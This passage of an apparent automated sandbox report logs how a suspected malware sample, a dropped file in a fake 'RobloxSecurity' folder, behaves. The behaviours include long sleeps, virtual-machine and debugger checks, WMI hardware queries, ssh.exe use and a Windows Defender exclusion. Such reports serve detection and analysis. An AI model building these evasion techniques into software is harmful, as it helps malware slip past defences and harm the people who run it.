                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452Thread sleep count: 6523 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452Thread sleep count: 2597 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -22136092888451448s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598984s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598656s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597970s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597844s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597077s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596953s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596843s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596078s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -595969s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -582622s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 128812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 328804Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 491792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeLast function: Thread delayed
                  Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599297Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598109Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598000Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597891Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597665Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598984
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598656
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597970
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597844
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597077
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596953
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596843
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596078
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 582622
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.41.drBinary or memory string: VMware
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.41.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.41.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.41.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.41.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2063310153.0000010DD583F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                  Source: Amcache.hve.41.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.41.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.41.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.41.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3543453931.00000167CFE24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                  Source: Amcache.hve.41.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.41.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.41.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.41.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000000.1791180656.000001F995EB2000.00000002.00000001.01000000.00000008.sdmp, vkefq4cv.oil.exe.0.dr, vkefq4cv.oil.exe.4.drBinary or memory string: qemu'H
                  Source: Amcache.hve.41.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.41.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.41.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.41.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.41.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.41.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.41.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.41.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.41.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: vkefq4cv.oil.exe, 0000002C.00000002.3000161085.000001EC7F363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                  Source: Amcache.hve.41.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
